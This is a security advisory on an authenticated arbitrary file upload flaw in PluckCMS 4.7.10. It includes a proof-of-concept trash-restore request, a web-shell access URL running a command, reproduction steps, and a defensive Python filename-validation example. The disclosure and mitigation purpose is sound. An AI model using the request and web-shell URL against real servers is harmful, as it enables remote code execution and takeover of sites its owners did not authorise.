PluckCMS 4.7.10 Arbitrary File Upload
PluckCMS version 4.7.10 (and potentially earlier) is vulnerable to arbitrary file upload.

This critical flaw allows an authenticated administrator to upload malicious files. The vulnerability stems from insufficient validation of file types during the upload process.

By exploiting this, an attacker can bypass security checks and upload files such as PHP web shells. These uploaded files can then be executed on the server.

This leads to Remote Code Execution (RCE), granting the attacker full control over the compromised web server. Users are strongly advised to upgrade PluckCMS to a patched version to mitigate this risk.

# Exploit Title: PluckCMS 4.7.10 - Unrestricted File Upload
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/pluck-cms/pluck/
# Software Link: https://github.com/pluck-cms/pluck/
# Version: 4.7.10
# Tested on: Windows
# CVE : CVE-2020-20969


**Proof of Concept:**
GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1
Host: pluck
Cookie: PHPSESSID=[valid_session_id]

**Access Method:**
http://pluck/files/exploit_copy.php?cmd=id

**Additional Conditions:**
1. Valid session cookie required (authenticated attack)
2. File `exploit.php.jpg` must exist in `data/trash/files/` before restoration
3. Server must not filter double extensions during file upload/trash operations
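Condition 3 above is the crux: a check that inspects only the final extension accepts `exploit.php.jpg` while a check that inspects every extension segment rejects it. The following is an added illustration written for this page in Python, not PluckCMS code (PluckCMS is PHP); the allowlists and the `SAFE_NAME` pattern are constructed for the example.

```python
"""Filename allowlisting that inspects every extension segment, not just the last."""
import posixpath
import re

# Extensions a PHP-enabled web server may execute; forbidden anywhere in the name.
EXECUTABLE_EXTS = frozenset({"php", "php3", "php4", "php5", "php7", "phtml", "phar"})
# Upload allowlist shared by both checks (constructed for this example).
ALLOWED_EXTS = frozenset({"jpg", "jpeg", "png", "gif", "pdf", "txt"})
# Bare basename characters only: letters, digits, dot, underscore, hyphen.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def naive_is_allowed(filename: str) -> bool:
    """Looks only at the last extension: the weak pattern the advisory describes."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED_EXTS


def hardened_is_allowed(filename: str) -> bool:
    """Rejects path components, odd characters, and any executable extension segment."""
    # Refuse anything that is not a bare basename (no traversal via a file parameter).
    if filename != posixpath.basename(filename) or "\\" in filename:
        return False
    if not SAFE_NAME.match(filename):
        return False
    segments = filename.lower().split(".")
    if len(segments) < 2:
        return False  # require an extension at all
    exts = segments[1:]
    # Every extension segment must be allowlisted; none may be executable.
    if any(e in EXECUTABLE_EXTS for e in exts):
        return False
    return all(e in ALLOWED_EXTS for e in exts)


def classify(filename: str) -> dict:
    """Returns both verdicts so the difference is visible side by side."""
    return {"naive": naive_is_allowed(filename), "hardened": hardened_is_allowed(filename)}


if __name__ == "__main__":
    for name in ("photo.jpg", "exploit.php.jpg", "shell.phtml", "../photo.jpg"):
        print(name, classify(name))
```

The same segment-by-segment rule should apply on upload, on rename and on trash restore, since a name that was harmless in one directory becomes executable once it lands under the web root.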


**Steps to Reproduce:**
1. Log in as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensuring it includes a valid session cookie.
3. The file will be restored and can be accessed through the URL.
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸